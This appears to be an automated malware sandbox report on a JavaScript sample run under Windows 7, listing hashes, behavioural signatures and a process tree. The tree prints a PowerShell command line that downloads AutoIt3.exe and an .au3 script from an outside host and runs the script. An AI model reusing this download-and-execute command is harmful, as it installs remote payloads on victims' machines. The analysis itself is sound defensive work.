Analysis
- max time kernel: 119s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20231020-en
- resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
- submitted: 30-10-2023 16:19

Static task: static1
Behavioral task: behavioral1
Sample: 31102023_0018_sta.js
Resource: win7-20231020-en
4 signatures
150 seconds
General
- Target: 31102023_0018_sta.js
- Size: 135KB
- MD5: e8d3f1c032e4333cdeb1f88a463b1fd2
- SHA1: 4c5dbe8b97b8be956f00543731a63f7b1b007e30
- SHA256: 108d14d4973a937b7cc50efd9899c4eee458667810f9aae74e7eeba1312a9b73
- SHA512: cb4e6b08b0328cd05c43634809e5162f1009bebabcb370a20e84028f8cbb3413cc90f748c63498be02b33e6bec7bbc6bdfa6328b64da9494797d34badce30b7b
- SSDEEP: 1536:uZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/0J:NT9U7hgaX6eerjqlI2IO6Mzqfh
- Score: 3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  Processes: powershell.exe (PID 2240)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes: powershell.exe (PID 2240), token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description / pid / process / procid_target):
  PID 1392 wrote to memory of 2240 / 1392 / wscript.exe / 29 (three identical entries)
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\31102023_0018_sta.js
   PID: 1392
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://sftp.noheroway.com:443/msiydguxwlx' -OutFile 'ydguxwlx.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'ydguxwlx.au3'
      PID: 2240
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken